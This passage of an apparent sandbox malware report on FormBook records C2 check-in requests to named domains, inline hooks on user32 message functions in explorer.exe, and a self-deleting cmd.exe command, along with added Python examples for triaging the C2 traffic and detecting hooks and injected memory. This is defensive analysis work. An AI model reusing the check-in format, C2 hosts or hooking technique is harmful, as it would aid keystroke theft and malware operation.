May 27, 2022 18:37:16.821484089 CEST | 9605 | OUT | GET /sn31/?m6R01xM0=f82GdrL9BOGPadRnOYEWsPSt+bOR3tUYa+dCVqOhmg/09rEzcw7t3bM5PuUufbFtM3zx&nPqD=gvLpMpxpWl HTTP/1.1
Host: www.bolacorner.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii: (seven NUL bytes)
May 27, 2022 18:37:16.958137035 CEST | 9605 | IN | HTTP/1.1 302 Found
content-length: 0
date: Fri, 27 May 2022 16:37:15 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.com
connection: close

Both requests come from explorer.exe, not from the sample (the "System process connects to network" signature), and both carry the same path /sn31/ and the same nPqD=gvLpMpxpWl parameter with a different base64-like first value; that shared shape is what the three ET FormBook check-in rules matched. FormBook's configuration holds a list of candidate C2 domains of which most are decoys, contacted in turn with the same check-in. www.bolacorner.com resolves through HugeDomains parking (the CNAME chain in the DNS answers) and answered with a 302 to the domain-sale page, which is why 52.71.57.184 is not flagged malicious; www.dawonderer.com, fronted by Cloudflare, is the live C2 candidate, and /sn31/ plus the nPqD value are the campaign-specific indicators.
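The sessions above, the DNS answers and the Snort alerts can be combined into one triage step that separates the live C2 from a decoy. The following Python is an added example and not part of the Joe Sandbox report or of any Emerging Threats rule: it embeds the two captured requests, the one captured response and the CNAME chains from this page as constructed input, applies a heuristic of my own for the request shape the ET FormBook check-in rules fired on (a single short directory, two query parameters, the first a long base64-like blob, the second a short token, Connection: close), and marks a host as a parked decoy when its CNAME chain or a redirect points at parking infrastructure. PARKING_MARKERS beyond hugedomains.com are illustrative assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed from the report's HTTP session rows (request line, headers and the one captured
# response). Not live traffic.
SESSIONS = [
    {"id": 0, "dst": "66.235.200.147",
     "request": "GET /sn31/?m6R01xM0=qZl/JLX84vnD5ytzVzk0/a0Hcpketn5qZPO1CaBkWF6tW2qs6ow5h/A/zRQwl5G72f7o&nPqD=gvLpMpxpWl HTTP/1.1",
     "headers": {"Host": "www.dawonderer.com", "Connection": "close"},
     "response": None},
    {"id": 1, "dst": "52.71.57.184",
     "request": "GET /sn31/?m6R01xM0=f82GdrL9BOGPadRnOYEWsPSt+bOR3tUYa+dCVqOhmg/09rEzcw7t3bM5PuUufbFtM3zx&nPqD=gvLpMpxpWl HTTP/1.1",
     "headers": {"Host": "www.bolacorner.com", "Connection": "close"},
     "response": {"status": 302,
                  "location": "https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.com"}},
]

# Constructed from the report's DNS answer rows: queried name -> CNAME chain.
CNAME_CHAINS = {
    "www.dawonderer.com": ["dawonderer.com"],
    "www.bolacorner.com": ["traff-1.hugedomains.com",
                           "hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com"],
}

# Assumption: substrings identifying domain-parking infrastructure. Only hugedomains.com occurs
# in the report; the other two are illustrative entries.
PARKING_MARKERS = ("hugedomains.com", "sedoparking.com", "parkingcrew.net")

B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class Verdict:
    session: int
    host: str
    checkin: bool                      # request shape matches the GET check-in seen in this report
    parked: bool                       # name resolves to / redirects to parking: a decoy, not live C2
    campaign: Optional[Tuple[str, str, str]]   # (path, 2nd param name, 2nd param value) shared across hosts
    reasons: List[str] = field(default_factory=list)


def split_query(query: str):
    """Split a query string by hand: urllib's parse_qsl would turn '+' into a space and break
    the base64-like value, which legitimately contains '+' and '/'."""
    return [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]


def checkin_shape(request_line: str, headers: dict):
    """My heuristic for the shape seen here: GET /<short dir>/?<k1>=<long base64-ish>&<k2>=<short token>
    with Connection: close. It is not the text of the ET Snort rules that fired."""
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        return False, None, ["method is not GET"]
    path, _, query = target.partition("?")
    if not re.fullmatch(r"/[a-z0-9]{2,8}/", path):
        return False, None, ["path is not a single short directory"]
    params = split_query(query)
    if len(params) != 2:
        return False, None, ["expected exactly two query parameters"]
    (k1, v1), (k2, v2) = params
    if not B64ISH.match(v1):
        return False, None, ["first value is not a long base64-like blob"]
    if not re.fullmatch(r"[A-Za-z0-9]{6,16}", v2):
        return False, None, ["second value is not a short token"]
    reasons = [f"{path} {k1}=<{len(v1)} chars> {k2}={v2}"]
    if headers.get("Connection", "").lower() != "close":
        reasons.append("missing Connection: close (weaker match)")
    return True, (path, k2, v2), reasons


def is_parked(host: str, response) -> bool:
    """Parked if the CNAME chain hits a parking provider or the server redirected to one."""
    if any(m in c for c in CNAME_CHAINS.get(host, []) for m in PARKING_MARKERS):
        return True
    if response and response["status"] in (301, 302):
        return any(m in response.get("location", "") for m in PARKING_MARKERS)
    return False


def triage(sessions) -> List[Verdict]:
    verdicts = []
    for s in sessions:
        host = s["headers"].get("Host", "")
        hit, campaign, reasons = checkin_shape(s["request"], s["headers"])
        parked = is_parked(host, s["response"])
        if parked:
            reasons.append("parking CNAME/redirect: decoy domain, not a live C2")
        verdicts.append(Verdict(s["id"], host, hit, parked, campaign, reasons))
    return verdicts


def live_c2_hosts(verdicts: List[Verdict]) -> List[str]:
    """Hosts worth blocking and hunting: check-in shape matched and not a parked decoy."""
    return sorted(v.host for v in verdicts if v.checkin and not v.parked)


if __name__ == "__main__":
    verdicts = triage(SESSIONS)
    for v in verdicts:
        print(v)
    print("live C2 candidates:", live_c2_hosts(verdicts))
```

The campaign tuple is deliberately returned separately from the verdict: the first parameter value changes per request (it carries the encrypted bot identity), while the path and the second parameter are stable across every host the bot tries, so those two are what to pivot on in proxy logs.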


                    Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data (first bytes at the function entry)
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1

These four user32 exports are what every Win32 message loop calls to fetch window messages, so patching their prologues inside explorer.exe (Target ID 6, whose memory matches the FormBook Yara rules) gives the injected code a view of keystroke and window messages for windows it never created; this is the mechanism behind the "Modifies the prolog of user mode functions (user mode inline hooks)" signature. The report shows only the first six patched bytes, not the full trampoline.
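Confirming such hooks on a live host means comparing the first bytes of each export in the suspect process against a clean copy. The following Python is an added example and not part of the Joe Sandbox report: the comparator and the trampoline classifier are platform-independent and run here on the six bytes the report lists as "New Data" against CLEAN_REFERENCE, which is a constructed, hypothetical set of clean prologues rather than the real user32.dll bytes of the analysis VM (so the verdict on this input is "unclassified", which is exactly when a manual look at the bytes is needed). The two Windows-only helpers use ctypes calls to OpenProcess, GetProcAddress and ReadProcessMemory and assume, as Windows guarantees within one boot session, that user32.dll is mapped at the same base in both processes.

```python
import ctypes
import sys

# Bytes the sandbox reported at the entry of the four hooked functions in explorer.exe
# (from the "Code Manipulations" table above). Used only as sample input for the comparator.
REPORTED_NEW_DATA = {
    "PeekMessageA": bytes.fromhex("488bb8844ee1"),
    "PeekMessageW": bytes.fromhex("488bb88ccee1"),
    "GetMessageW":  bytes.fromhex("488bb88ccee1"),
    "GetMessageA":  bytes.fromhex("488bb8844ee1"),
}
# Constructed, hypothetical clean prologues for the comparison below; NOT the real user32.dll bytes.
CLEAN_REFERENCE = {
    "PeekMessageA": bytes.fromhex("4883ec38488b05"),
    "PeekMessageW": bytes.fromhex("4883ec38488b05"),
    "GetMessageW":  bytes.fromhex("4883ec38488b05"),
    "GetMessageA":  bytes.fromhex("4883ec38488b05"),
    "DispatchMessageW": bytes.fromhex("4883ec28"),
}


def classify_prologue(b: bytes) -> str:
    """Name the trampoline shapes inline hooks usually plant at a function's first bytes (x64)."""
    if b[:1] == b"\xe9":                                   # jmp rel32 (+/-2 GiB reach)
        return "jmp rel32"
    if b[:2] == b"\xff\x25":                               # jmp qword [rip+disp32], target stored nearby
        return "jmp [rip+disp32]"
    if b[:1] == b"\x68" and b[5:6] == b"\xc3":             # push imm32; ret (low addresses / 32-bit)
        return "push/ret"
    if b[:2] == b"\x48\xb8" and b[10:12] == b"\xff\xe0":   # mov rax, imm64; jmp rax (absolute)
        return "mov rax, imm64; jmp rax"
    return "unclassified"


def find_mismatches(reference: dict, observed: dict) -> dict:
    """Functions whose observed prologue differs from the reference copy, with a classification.
    Functions missing from `observed` are skipped: nothing to compare."""
    out = {}
    for name, ref in reference.items():
        got = observed.get(name)
        if got is None:
            continue
        n = min(len(ref), len(got))
        if ref[:n] != got[:n]:
            out[name] = classify_prologue(got)
    return out


def _kernel32():
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    k32.ReadProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    return k32


def local_prologue(module: str, func: str, n: int = 16) -> bytes:
    """Windows only: the function's first bytes in our own process, used as the reference copy.
    If the malware has injected into this process too, both copies are hooked and nothing is
    flagged; compare against the on-disk DLL in that case."""
    k32 = _kernel32()
    addr = k32.GetProcAddress(ctypes.WinDLL(module)._handle, func.encode())
    return ctypes.string_at(addr, n)


def read_remote_prologue(pid: int, module: str, func: str, n: int = 16) -> bytes:
    """Windows only: the same bytes inside another process (e.g. the injected explorer.exe)."""
    k32 = _kernel32()
    PROCESS_VM_READ, PROCESS_QUERY_INFORMATION = 0x0010, 0x0400
    addr = k32.GetProcAddress(ctypes.WinDLL(module)._handle, func.encode())
    h = k32.OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, 0, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        buf = (ctypes.c_ubyte * n)()
        got = ctypes.c_size_t(0)
        if not k32.ReadProcessMemory(h, addr, ctypes.cast(buf, ctypes.c_void_p), n, ctypes.byref(got)):
            raise ctypes.WinError(ctypes.get_last_error())
        return bytes(buf)[:got.value]
    finally:
        k32.CloseHandle(h)


if __name__ == "__main__":
    print(find_mismatches(CLEAN_REFERENCE, REPORTED_NEW_DATA))
    if sys.platform == "win32" and len(sys.argv) == 2:      # usage: python hooks.py <explorer.exe pid>
        pid = int(sys.argv[1])
        ref = {f: local_prologue("user32", f) for f in REPORTED_NEW_DATA}
        obs = {f: read_remote_prologue(pid, "user32", f) for f in REPORTED_NEW_DATA}
        print(find_mismatches(ref, obs))
```

Run against a live explorer.exe the comparison flags only functions whose bytes differ from this process's copy, so it is a quick confirmation of what the sandbox reported, not a general hook scanner; a full check walks the export table and compares every export against the file on disk.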


                    Target ID:0
                    Start time:18:35:17
                    Start date:27/05/2022
                    Path:C:\Users\user\Desktop\skyrunyyu655432.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\skyrunyyu655432.exe"
                    Imagebase:0x400000
                    File size:278102 bytes
                    MD5 hash:070A940CCBC84F85A8BA749ECCF55618
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:2
                    Start time:18:35:19
                    Start date:27/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
                    Imagebase:0x1e0000
                    File size:134144 bytes
                    MD5 hash:E85BB68B7CBEFADF0D1ACD4B7B8BD528
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Antivirus matches:
                    • Detection: 37%, ReversingLabs
                    Reputation:low

                    Target ID:3
                    Start time:18:35:20
                    Start date:27/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
                    Imagebase:0x1e0000
                    File size:134144 bytes
                    MD5 hash:E85BB68B7CBEFADF0D1ACD4B7B8BD528
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Target ID:6
                    Start time:18:35:27
                    Start date:27/05/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff6b8cf0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Target ID:13
                    Start time:18:35:59
                    Start date:27/05/2022
                    Path:C:\Windows\SysWOW64\ipconfig.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                    Imagebase:0x160000
                    File size:29184 bytes
                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    Target ID:14
                    Start time:18:36:05
                    Start date:27/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
                    Imagebase:0xc20000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:15
                    Start time:18:36:06
                    Start date:27/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

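The process entries above show FormBook code matched in memory of two Windows binaries (explorer.exe, Target ID 6, and ipconfig.exe, Target ID 13) and a cmd.exe launched only to delete the dropped payload. The following is an added example, not part of the Joe Sandbox report, that parses the report's own memory-dump identifiers and process records (copied from the entries above, so the input is constructed from this page) and derives those two findings programmatically. It relies on three fields of the .sdmp name only: the first equals the Target ID in hex (00000006 for Target ID 6, 0000000D for Target ID 13), the fourth is the base address of the dumped region, and the fifth is the Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE). That reading of the fourth and fifth fields is an assumption; the remaining fields are kept raw and not interpreted. The SYSTEM_BINARIES list, the regexes and the function names are likewise the example's own.

```python
"""Added example (not part of the Joe Sandbox report or of FormBook): parse the
process entries and Yara memory-match identifiers reproduced in the report and
derive two behaviours a responder cares about: FormBook code resident in RWX
memory of Windows system processes (injection) and the self-deleting cmd.exe.

Field meanings in the .sdmp identifier beyond PID, address and page protection
are assumptions and are kept raw."""
import re
from dataclasses import dataclass

# Win32 page-protection constants (memoryapi.h).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# Binaries that ship with Windows; FormBook code inside them means injection.
SYSTEM_BINARIES = {"explorer.exe", "ipconfig.exe", "cmd.exe", "conhost.exe"}

# Constructed from the report's process list (Target IDs 6, 13, 14, 15).
REPORT_PROCESSES = [
    {"target_id": 6, "path": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE",
     "yara": ["00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp",
              "00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp"]},
    {"target_id": 13, "path": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": r"C:\Windows\SysWOW64\ipconfig.exe",
     "yara": ["0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp",
              "0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp",
              "0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp"]},
    {"target_id": 14, "path": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"', "yara": []},
    {"target_id": 15, "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "yara": []},
]


@dataclass
class MemoryMatch:
    pid: int          # first field; equals the report's Target ID
    address: int      # fourth field: base address of the dumped region (assumed)
    protect: int      # fifth field: page protection of the region (assumed)
    raw_fields: tuple  # all eight fields as integers, for anything not decoded here


def parse_sdmp_name(name: str) -> MemoryMatch:
    """Split a Joe Sandbox memory-dump identifier (8 dot-separated hex fields
    plus '.sdmp') into integers. Only PID, address and protection are relied on."""
    m = re.fullmatch(r"((?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp", name)
    if not m:
        raise ValueError(f"not a .sdmp identifier: {name}")
    fields = tuple(int(f, 16) for f in m.group(1).split("."))
    return MemoryMatch(pid=fields[0], address=fields[3], protect=fields[4],
                       raw_fields=fields)


# cmd.exe launched as '/c del "<path>.exe"' with an optional quoted path.
SELF_DELETE = re.compile(r'^/c\s+del\s+"?(?P<target>[^"]+\.exe)"?', re.IGNORECASE)


def assess(processes):
    """Return (target_id, finding) tuples for the two behaviours of interest."""
    findings = []
    for p in processes:
        exe = p["path"].rsplit("\\", 1)[-1].lower()
        for name in p["yara"]:
            mm = parse_sdmp_name(name)
            if mm.pid != p["target_id"]:
                # A dump attributed to the wrong process would be a parsing error, not a finding.
                findings.append((p["target_id"], f"dump PID {mm.pid} does not match target"))
                continue
            # Executable, writable memory holding FormBook code inside a Windows binary:
            # the code did not come from that binary's image, so it was injected.
            if exe in SYSTEM_BINARIES and mm.protect == PAGE_EXECUTE_READWRITE:
                findings.append((p["target_id"],
                                 f"injected RWX code in {exe} at 0x{mm.address:X}"))
        m = SELF_DELETE.match(p["cmdline"])
        if exe == "cmd.exe" and m:
            findings.append((p["target_id"], f"self-deletion of {m.group('target')}"))
    return findings


if __name__ == "__main__":
    for target_id, finding in assess(REPORT_PROCESSES):
        print(f"Target {target_id}: {finding}")
```

Run on the report's own records this flags both explorer.exe dumps at 0xEC39000 and the two RWX regions of ipconfig.exe (0x24C0000 and 0x2600000), skips the PAGE_READWRITE region at 0x2680000 (data, not executable code), and reports the deletion of jfotlqeoqb.exe by Target ID 14. In a real triage pipeline the same logic would run over the sandbox's JSON export rather than over records transcribed by hand, and the protection check should be paired with the signature the report raises for process hollowing, since a section-mapped RWX region is only one of several ways the injected code can appear.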
                    No disassembly